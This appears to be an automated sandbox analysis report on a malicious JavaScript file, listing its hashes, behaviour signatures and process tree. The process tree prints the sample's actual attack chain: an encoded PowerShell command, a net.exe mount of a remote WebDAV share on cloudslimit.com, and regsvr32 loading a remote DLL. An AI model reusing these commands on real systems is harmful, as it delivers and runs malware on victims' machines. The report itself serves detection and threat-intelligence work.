Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
21-08-2024 15:17
Static task
static1
Behavioral task
behavioral1
Sample
2a29e36194a4a1374f143aee2c97a4c710ee6fd28bdcad0398f2373bf0a55fd0.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2a29e36194a4a1374f143aee2c97a4c710ee6fd28bdcad0398f2373bf0a55fd0.js
Resource
win10v2004-20240802-en
General
-
Target
2a29e36194a4a1374f143aee2c97a4c710ee6fd28bdcad0398f2373bf0a55fd0.js
-
Size
14KB
-
MD5
76b1c0c1f2ae1fe9dc55aa7f181ab628
-
SHA1
bf32a35f1d9d971cb1ed7e977b1cf8e177ee8479
-
SHA256
2a29e36194a4a1374f143aee2c97a4c710ee6fd28bdcad0398f2373bf0a55fd0
-
SHA512
d8f4723b2a154ff844556a0a09073380ec4b2f34b4ad6a39e558c781f8c0e4354168cddb770127992bf6a8835dcc4d92bfe07e462071c5cd5df0dff8b57aa3a2
-
SSDEEP
96:2qZILNtuhAjOSCG+I9PZL702KMCzK/pGPiKEKU1SbFAPFFZAPKzMlTYvYWw:tZUPOSJ+0ZL7tmpmoblr
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2808 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2808 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 588 wrote to memory of 2808 588 wscript.exe 30 PID 588 wrote to memory of 2808 588 wscript.exe 30 PID 588 wrote to memory of 2808 588 wscript.exe 30 PID 2808 wrote to memory of 2356 2808 powershell.exe 32 PID 2808 wrote to memory of 2356 2808 powershell.exe 32 PID 2808 wrote to memory of 2356 2808 powershell.exe 32 PID 2808 wrote to memory of 2908 2808 powershell.exe 33 PID 2808 wrote to memory of 2908 2808 powershell.exe 33 PID 2808 wrote to memory of 2908 2808 powershell.exe 33 PID 2808 wrote to memory of 2908 2808 powershell.exe 33 PID 2808 wrote to memory of 2908 2808 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2a29e36194a4a1374f143aee2c97a4c710ee6fd28bdcad0398f2373bf0a55fd0.js1⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADIAMwA3ADUAMgA3ADUAMgAxADIAMQA3ADIANgAuAGQAbABsAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\3⤵PID:2356
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\123752752121726.dll3⤵PID:2908
-
-